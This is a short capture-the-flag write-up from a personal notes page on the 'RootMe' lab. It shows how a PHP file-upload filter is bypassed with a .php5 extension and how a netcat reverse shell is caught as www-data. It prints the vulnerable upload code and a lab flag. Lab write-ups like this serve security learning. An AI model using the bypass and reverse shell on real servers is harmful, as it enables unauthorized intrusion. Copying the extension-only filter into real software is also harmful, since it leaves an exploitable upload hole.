InfoSec LAB

RootMe_Exploitation

Created: 2 min read

Arbitrary File Upload / RCE

I already uploaded the PHP payload with different extensions to test out the filter

┌──(kali㉿kali)-[~/archive/thm/rootme]
└─$ curl http://$IP/uploads/shell.php5

While most of them didn’t work .php5 worked

┌──(kali㉿kali)-[~/archive/thm/rootme]
└─$ nnc 9999                
listening on [any] 9999 ...
connect to [10.9.2.95] from (UNKNOWN) [10.10.183.226] 36296
whoami
www-data
hostname
rootme
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc fq_codel state UP group default qlen 1000
    link/ether 02:20:67:44:9c:e1 brd ff:ff:ff:ff:ff:ff
    inet 10.10.183.226/16 brd 10.10.255.255 scope global dynamic eth0
       valid_lft 2115sec preferred_lft 2115sec
    inet6 fe80::20:67ff:fe44:9ce1/64 scope link
       valid_lft forever preferred_lft forever

Initial Foothold established to the target system as the www-data account via arbitrary file upload to RCE

Why did it work?

$ cat index.php
<?php
session_start();
// if (!isset($_SESSION['admin'])){
//     header('Location: ../admin');
// }
 
$uploadOk = 2;
 
if (isset($_POST["submit"])){
    $target_dir = "../uploads/";
    $target_file = $target_dir . basename($_FILES["fileUpload"]["name"]);
    $file_filetype = strtolower(pathinfo($target_file,PATHINFO_EXTENSION));
 
    if ($file_filetype == "php"){
        $result = "PHP não é permitido!";
        $uploadOk = 0;
    } else {
        if (file_exists($target_file)){
            $result = "O arquivo já existe.";
            $uploadOk = 0;
        }
        if (move_uploaded_file($_FILES["fileUpload"]["tmp_name"], $target_file)) {
            $result = "O arquivo foi upado com sucesso!";
            $uploadOk = 1;
            // if ($file_filetype == "php1" || $file_filetype == "php2" || $file_filetype == "php3" || $file_filetype == "php4" || $file_filetype == "php5" || $file_filetype == "php6" || $file_filetype == "php7" || $file_filetype == "php8" || $file_filetype == "php9"){
            //     $result = "hackIT{uplo4d_f1l3_byp4ss}";;
            // }
        } else {
            $result = "Erro enviando o arquivo!";
            $uploadOk = 0;
        }
    }
}
?>

Interactive Graph View

Backlinks